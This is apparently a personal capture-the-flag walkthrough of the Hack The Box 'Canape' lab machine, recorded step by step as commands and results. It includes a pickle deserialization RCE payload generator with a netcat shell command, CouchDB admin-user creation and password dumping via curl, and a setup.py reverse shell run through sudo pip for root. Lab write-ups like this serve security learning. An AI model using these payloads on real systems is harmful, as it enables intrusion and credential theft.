pMachine-Name  :  Canape
IP-Address    :  10.129.107.169

Command-line: sudo nmap -A 10.129.107.169
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 02:32 EST
    Nmap scan report for 10.129.107.169
    Host is up (0.051s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    | http-git:
    |   10.129.107.169:80/.git/
    |     Git repository found!
    |     Repository description: Unnamed repository; edit this file 'description' to name the...
    |     Last commit message: final # Please enter the commit message for your changes. Li...
    |     Remotes:
    |_      http://git.canape.htb/simpsons.git
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Simpsons Fan Site
    |_http-trane-info: Problem with XML parsing of /evox/about
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 3.16 (90%), Linux 3.18 (90%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 80/tcp)
    HOP RTT      ADDRESS
    1   48.78 ms 10.10.14.1
    2   53.60 ms 10.129.107.169

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds



Command-Line: nmap -p- -A -T4 10.129.107.169
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 01:40 EST
    Nmap scan report for canape.htb (10.129.107.169)
    Host is up (0.054s latency).
    Not shown: 65533 filtered ports
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
    | http-git:
    |   10.129.107.169:80/.git/
    |     Git repository found!
    |     Repository description: Unnamed repository; edit this file 'description' to name the...
    |     Last commit message: final # Please enter the commit message for your changes. Li...
    |     Remotes:
    |_      http://git.canape.htb/simpsons.git
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Simpsons Fan Site
    |_http-trane-info: Problem with XML parsing of /evox/about
    65535/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
    |   256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
    |_  256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds




Command-Line: ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt -f -t 50 -i 403,301,302 -u http://10.129.107.169
Result:
      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt | HTTP method: GET | Threads: 50 | Wordlist size: 882080

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-02-19_03-02-40.log

    Target: http://10.129.107.169/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.107.169/_21-02-19_03-02-41.txt

    [03:02:41] Starting:
    [03:02:42] 403 -  294B  - /cgi-bin/
    [03:02:42] 403 -  292B  - /icons/
    [03:02:43] 301 -  311B  - /static  ->  http://10.129.107.169/static/
    [03:14:18] 403 -  300B  - /server-status/
    [03:14:18] 403 -  299B  - /server-status


Browser: http://10.129.107.169/.git/
Result:
    Index of /.git
    [ICO]	Name	Last modified	Size	Description
    [PARENTDIR]	Parent Directory	 	-
    [ ]	COMMIT_EDITMSG	2018-04-10 13:26 	267
    [ ]	HEAD	2018-01-15 18:35 	23
    [DIR]	branches/	2018-01-15 18:35 	-
    [ ]	config	2018-01-23 18:34 	259
    [ ]	description	2018-01-15 18:35 	73
    [DIR]	hooks/	2018-01-15 18:35 	-
    [ ]	index	2018-04-10 13:26 	1.1K
    [DIR]	info/	2018-01-15 18:35 	-
    [DIR]	logs/	2018-01-15 18:39 	-
    [DIR]	objects/	2018-04-10 13:26 	-
    [DIR]	refs/	2018-01-15 18:40 	-
    Apache/2.4.18 (Ubuntu) Server at 10.129.107.169 Port 80

Browser: http://10.129.107.169/.git/config
Result:
    [core]
    	repositoryformatversion = 0
    	filemode = true
    	bare = false
    	logallrefupdates = true
    [remote "origin"]
    	url = http://git.canape.htb/simpsons.git
    	fetch = +refs/heads/*:refs/remotes/origin/*
    [branch "master"]
    	remote = origin
    	merge = refs/heads/master


Command-Line: git clone http://git.canape.htb/simpsons.git
Result: /simpsons
Command-Line: git log
Result:
    commit c8a74a098a60aaea1af98945bd707a7eab0ff4b0
    Author: Homer Simpson <homerj0121@outlook.com>
    Date:   Mon Jan 15 18:46:30 2018 -0800

        temporarily hide check due to vulerability

Command-Line: git diff c8a74a098a60aaea1af98945bd707a7eab0ff4b0
Result:
    def submit():
         error = None
    @@ -29,9 +50,17 @@ def submit():
             try:
                 char = request.form["character"]
                 quote = request.form["quote"]
    -            p_id = base64.b64encode(char + quote)
    -           cPickle.dump(char + quote, open("/tmp/" + p_id + ".p", "wb"))
    -           success = True
    +            if not char or not quote:
    +                error = True
    +            if not char or not quote:
    +                error = True
    +            elif not any(c.lower() in char.lower() for c in WHITELIST):
    +                error = True
    +            else:
    +                # TODO - Pickle into dictionary instead, `check` is ready
    +                p_id = md5(char + quote).hexdigest()
    +                outfile = open("/tmp/" + p_id + ".p", "wb")
    +               outfile.write(char + quote)
    +               outfile.close()
    +               success = True
             except Exception as ex:
                 error = True

    @@ -40,7 +69,13 @@ def submit():
     @app.route("/check", methods=["POST"])
     def check():
         path = "/tmp/" + request.form["id"] + ".p"
    -    item = cPickle.load(open(path, "rb"))
    +    data = open(path, "rb").read()
    +
    +    if "p1" in data:
    +        item = cPickle.loads(data)
    +    else:
    +        item = data
    +
         return "Still reviewing: " + item

         if __name__ == "__main__":
             app.run()

Notes: Pickle vulnerability. Preparing script to get reverse-shell.


Browser: python pickle payloads
URL: https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd
Result:
    #!/usr/bin/python
    #
    # Pickle deserialization RCE payload.
    # To be invoked with command to execute at it's first parameter.
    # Otherwise, the default one will be used.
    #

    import cPickle
    import sys
    import base64

    DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
    COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

    class PickleRce(object):
        def __reduce__(self):
            import os
            return (os.system,(COMMAND,))

    print base64.b64encode(cPickle.dumps(PickleRce()))


IppSec-Script: /pickle_exploit.py

Command-Line: nc -lvnp 9001
Command-Line: python pickle_exploit.py
Result:
    *** REVERSE SHELL ***


$ whoami
Result: www-data

$ export TERM=linux
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Result: www-data@canape:/$

www-data@canape:/$: ctrl+z...stty raw -echo...fg...enter...enter
Result: www-data@canape:/$

www-data@canape:/$ ls /home
Result: homer
Notes: Found user 'homer'.


linpeas.sh:
Result:
    Linux version 4.4.0-119-generic
    Sudo version 1.8.16
    apache2 process found (dump creds from memory as root)


www-data@canipe:/dev/shm/uk47$ curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:oops' --data-binary '{"type": "user","name": "oops","roles": ["_admin"],"roles": [],"password": "password"}'

www-data@canipe:/dev/shm/uk47$ curl 127.0.0.1:5984/passwords/_all_docs --user 'oops:password'
Result:
    {"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}

www-data@canipe:/dev/shm/uk47$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4 --user 'oops:password'
Result:
    {"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}

www-data@canipe:/dev/shm/uk47$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d --user 'oops:password'
Result:
    {"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}

www-data@canipe:/dev/shm/uk47$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f --user 'oops:password'
Result:
    {"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}

www-data@canipe:/dev/shm/uk47$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738 --user 'oops:password'
Result:
    {"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}


Notes: Password is stored in plain text in the first row (0B4jyA0xtytZi7esBNGp). Username (homer)

Command-Line: ssh homer@canape.htb -p 65535
Password: 0B4jyA0xtytZi7esBNGp
Result:
    *** USER ACCESS ***
    homer@canape:~$

homer@canape:~$ cat /user.txt
Result: bce918696f293e62b2321703bb27288d
    *** USER OWNED ***


Attempting root access...


homer@canape:~$ sudo -l
Result:
    Matching Defaults entries for homer on canape:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User homer may run the following commands on canape:
        (root) /usr/bin/pip install *


homer@canape:/dev/shm$ nano setup.py
File-Contents:
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("10.10.14.155", 9001))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/bash","-i"])


Command-Line: nc -lvnp 9001
homer@canape:/dev/shm$ sudo pip install .
Result:
    The directory '/home/homer/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
    The directory '/home/homer/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.

    Processing /dev/shm

    *** ROOT ACCESS ***
    root@canape:/tmp/pip-5L5bCG-build#

root@canape:/tmp/pip-5L5bCG-build# cat /root/root.txt
Result: 928c3df1a12d7f67d2e8c2937120976d
    *** ROOT OWNED ***


      *** FINISHED ***
